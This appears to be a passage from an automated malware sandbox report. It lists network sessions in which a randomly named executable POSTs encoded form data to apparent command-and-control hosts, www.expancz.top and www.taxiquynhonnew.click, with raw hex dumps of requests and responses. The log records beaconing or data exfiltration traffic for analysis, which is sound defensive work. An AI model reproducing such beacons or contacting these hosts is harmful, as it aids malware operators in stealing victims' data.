                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Raw: 49 4e 76 6c 66 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 31 6e 66 77 71 77 2b 36 4a 46 31 4f 30 68 73 72 53 62 6d 30 62 52 6c 36 78 44
                                                        Data Ascii: INvlf=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
                                                        Dec 3, 2024 14:17:12.207675934 CET697INHTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 552
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.949917107.155.56.30805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:13.249386072 CET820OUTPOST /2gcl/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.expancz.top
                                                        Origin: http://www.expancz.top
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.expancz.top/2gcl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Raw: 49 4e 76 6c 66 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 67 70 67 43 52 49 79 4f 54 73 49 37 62 2b 2b 52 7a 30 55 56 63 37 74 4d 59 5a 55 34 62 61 34 4d 45 46 33 49 50 63 31 65 68 6e 44 65 7a 62 68 51 45 50 4d 68 6f 69 65 6d 65 4f 4e 59 44 50 63 53 49 49 52 73 50 72 77 39 48 34 31 75 46 33 5a 48 42 53 30 76 6d 4c 4f 77 71 64 71 6f 6b 77 54 61 79 79 6e 73 41 69 65 32 66 43 52 4b 4d 45 63 2b 63 5a 32 4b 4e 6c 62 43 56 43 63 78 53 4c 68 49 4a 35 79 76 49 2f 39 5a 62 41 7a 6a 62 32 69 64 34 72 51 69 45 42 39 65 35 72 41 47 56 41 72 67 39 39 57 6d 77 57 31 51 3d 3d
                                                        Data Ascii: INvlf=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb2id4rQiEB9e5rAGVArg99WmwW1Q==
                                                        Dec 3, 2024 14:17:14.861565113 CET697INHTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 552
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.949923107.155.56.30805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:15.922588110 CET1833OUTPOST /2gcl/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.expancz.top
                                                        Origin: http://www.expancz.top
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.expancz.top/2gcl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Raw: 49 4e 76 6c 66 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 6f 70 67 78 5a 49 7a 70 48 73 4c 37 62 2b 7a 78 7a 31 55 56 63 71 74 4d 41 56 55 35 6d 74 34 4b 49 46 78 62 48 63 6c 76 68 6e 59 4f 7a 62 2b 67 45 4d 54 52 6f 7a 65 6d 4f 4b 4e 59 7a 50 63 53 49 49 52 72 33 72 79 70 54 34 7a 75 46 30 65 48 42 57 77 76 6e 46 4f 30 47 4e 71 6f 51 4b 54 4c 53 79 69 34 73 69 63 45 48 43 54 71 4d 61 53 65 64 61 32 4b 52 6d 62 43 49 37 63 78 6d 68 68 4b 5a 35 33 2b 74 2b 68 36 76 69 6c 51 33 6a 30 4f 73 75 59 6b 51 78 31 4f 51 54 61 45 78 2b 74 6c 49 53 54 47 5a 2b 70 72 53 55 4e 79 66 48 6a 36 65 32 66 7a 4a 47 78 50 61 4d 58 76 36 30 6c 62 4c 32 51 39 67 6a 6b 48 50 6b 53 6b 4e 54 66 66 6a 63 2f 6f 33 41 35 54 73 78 48 59 48 53 51 30 6b 71 2b 47 73 64 63 76 73 4e 67 64 6f 39 51 54 71 68 56 2b 35 38 37 2f 70 43 45 70 47 4a 48 71 41 6a 52 4c 49 52 2b 35 4b 36 4e 55 44 5a 4e 62 64 6d 70 6c 78 32 46 46 59 5a 48 54 4c 6a 5a 32 75 45 [TRUNCATED]
                                                        Data Ascii: INvlf=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsopgxZIzpHsL7b+zxz1UVcqtMAVU5mt4KIFxbHclvhnYOzb+gEMTRozemOKNYzPcSIIRr3rypT4zuF0eHBWwvnFO0GNqoQKTLSyi4sicEHCTqMaSeda2KRmbCI7cxmhhKZ53+t+h6vilQ3j0OsuYkQx1OQTaEx+tlISTGZ+prSUNyfHj6e2fzJGxPaMXv60lbL2Q9gjkHPkSkNTffjc/o3A5TsxHYHSQ0kq+GsdcvsNgdo9QTqhV+587/pCEpGJHqAjRLIR+5K6NUDZNbdmplx2FFYZHTLjZ2uENQ82BeT4xf5FpIa25PHSiG7jVXrYaoI5ym5sgQeQ5yp6e8zBqMq637ySr7YPKMU7QCxOW7+nGdn3sLqc2W9YO2bmev1EbZJLErjZUshp33FnmIpVt40VNIJqcMM+dCAbz7OoZQ/cG2298voQBhGYaW5EtFm4xSCoEi3L5vTQONjHZpaYx5yVWaDk0BSQ+0quPoSPCUxSBA7NRwMtR3aBYkJmeOUNyAQ1AX1TviyksQlJJizUgyGNfxbYgxdfjTtj9+9IXWJPBn7aTjAIRkw9C0YAW7iH86aLu89SS3QKBxW0vGZ/jn3tez/0LAeMGHhD9FHgQXVbMNl6GZQGmym9V3aiTK3JWS4/S0b4Sc/aVDqkBraNO5OYgNGm4ts+44WoSDmeo0UiVnAjemeL5JrPI33BOt+AuQcY8evS5e8aJynId14/V3NeG6JypWX2PPsBM12FWpVHFVejnMW+TdB2E+7AxoqbIaFg0HQ8l377+BlYp3Gt2Qsu9Fx45WIi1cTJjh52RDjx6WXsJtnt3wndA5bPQ1N4VhBnlSa0Om37pXy/kS7r4P9Bn1ShUKdRjDRp4ty3CKvevUPYcYOay2Lfml+rsHSV6LoezvkUEWvBsoNhaYujsX2jL254X4+8mBOBccxhBzHqOb/Kzv94DRivMHHxecS9CbagMt [TRUNCATED]
                                                        Dec 3, 2024 14:17:17.521039963 CET697INHTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 552
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.949930107.155.56.30805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:18.585093021 CET533OUTGET /2gcl/?INvlf=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&afo=JnyH0Z2 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.expancz.top
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Dec 3, 2024 14:17:20.238722086 CET1236INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 9651
                                                        Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "6736b650-25b3"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                        Dec 3, 2024 14:17:20.238740921 CET1236INData Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                        Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                        Dec 3, 2024 14:17:20.238748074 CET1236INData Raw: bb a5 e5 8f 8a e4 bb a5 e5 90 8e e7 89 88 e6 9c ac e5 8f af e4 bb a5 e4 bd bf e7 94 a8 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c
                                                        Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                        Dec 3, 2024 14:17:20.238873959 CET672INData Raw: 20 20 20 20 20 20 20 20 20 6d 79 42 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 79 53 63 72 69 70 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0a 20 20 20 20 20
                                                        Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                        Dec 3, 2024 14:17:20.238879919 CET1236INData Raw: 0a 20 20 20 20 20 20 79 61 68 6f 6f 53 6f 75 72 63 65 3a 20 27 33 27 2c 0a 20 20 20 20 20 20 74 69 6b 54 6f 6b 53 6f 75 72 63 65 3a 20 27 34 27 0a 20 20 20 20 7d 3b 0a 20 20 20 20 2f 2f 20 e6 b8 a0 e9 81 93 e5 9f 8b e7 82 b9 e5 88 a4 e6 96 ad 0a
                                                        Data Ascii: yahooSource: '3', tikTokSource: '4' }; // // function checkSource(data, ch) { return Object.keys(data).map(function (key) { return data[key] }).indexOf(ch)
                                                        Dec 3, 2024 14:17:20.238887072 CET1236INData Raw: 20 20 20 20 74 2e 61 73 79 6e 63 20 3d 20 21 30 3b 0a 20 20 20 20 20 20 20 20 74 2e 73 72 63 20 3d 20 76 3b 0a 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 5b 30 5d 3b 0a 20 20 20
                                                        Data Ascii: t.async = !0; t.src = v; s = b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t, s) }(window, document, 'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('dataProcessi
                                                        Dec 3, 2024 14:17:20.239329100 CET1236INData Raw: 3d 20 30 3b 20 6e 20 3c 20 74 74 71 2e 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 20 6e 2b 2b 29 20 74 74 71 2e 73 65 74 41 6e 64 44 65 66 65 72 28 65 2c 20 74 74 71 2e 6d 65 74 68 6f 64 73 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: = 0; n < ttq.methods.length; n++) ttq.setAndDefer(e, ttq.methods[ n]); return e }, ttq.load = function(e, n) { var i = "https://analytics.tiktok.com/i18n/pixel/events.js"; ttq._i = ttq._i
                                                        Dec 3, 2024 14:17:20.239335060 CET1236INData Raw: 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 67 6f 6f 67 6c 65 5f 69 64 20
                                                        Data Ascii: aLayer.push(arguments);} gtag('js', new Date()); gtag('config', google_id || 'G-CC0LH72W84'); console.log('google PageView');</script><script type=application/javascript>if(localStorage.source === sourceData.yahooSource) { (f
                                                        Dec 3, 2024 14:17:20.239341021 CET578INData Raw: 3d 20 6e 6f 77 3b 0a 20 20 20 20 20 20 7d 2c 20 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20 2f 2f 20 2f 2f 20 e9 98 bb e6 ad a2 e5 8f 8c e6 8c 87 e6 94 be e5 a4 a7 0a 20 20 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c
                                                        Data Ascii: = now; }, false); // // // document.addEventListener('gesturestart', function (event) { // event.preventDefault(); // }); }</script><link href=/static/css/app.8625cfbde75fd1ee0a0c2bb00d896


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.94994854.179.173.60805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:26.270303965 CET823OUTPOST /y49d/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.taxiquynhonnew.click
                                                        Origin: http://www.taxiquynhonnew.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.taxiquynhonnew.click/y49d/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Raw: 49 4e 76 6c 66 3d 72 34 72 4b 63 69 62 56 53 78 34 76 42 51 52 5a 42 77 42 61 4e 6f 4c 76 62 42 4e 47 68 73 2b 47 2f 50 48 7a 76 6f 6b 64 41 6e 63 75 4f 37 4b 34 58 41 58 68 4a 58 70 6e 7a 36 33 66 2f 2f 54 7a 49 4d 34 53 56 47 30 39 72 68 70 34 63 6f 52 7a 53 67 44 6a 65 6e 2b 43 6a 31 4f 38 6a 65 55 63 32 63 69 75 58 72 64 65 61 56 54 59 77 72 6f 49 78 39 4a 35 53 2b 32 71 64 53 71 55 66 42 74 59 64 76 33 57 38 52 72 59 55 51 57 56 36 4d 67 37 51 59 49 59 67 55 79 77 7a 6e 76 6d 47 39 64 51 6b 45 57 41 2b 72 44 35 42 67 74 43 49 56 35 6d 71 75 53 6d 33 5a 63 67 5a 50 77 2f
                                                        Data Ascii: INvlf=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEWA+rD5BgtCIV5mquSm3ZcgZPw/


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.94995654.179.173.60805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:28.938545942 CET847OUTPOST /y49d/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.taxiquynhonnew.click
                                                        Origin: http://www.taxiquynhonnew.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.taxiquynhonnew.click/y49d/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Raw: 49 4e 76 6c 66 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 63 48 65 6f 35 58 33 31 4e 6d 78 45 63 37 44 73 42 63 72 44 4d 6e 53 34 73 43 79 67 3d 3d
                                                        Data Ascii: INvlf=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHeo5X31NmxEc7DsBcrDMnS4sCyg==
                                                        Dec 3, 2024 14:17:30.561443090 CET371INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Tue, 03 Dec 2024 13:17:30 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.taxiquynhonnew.click/y49d/
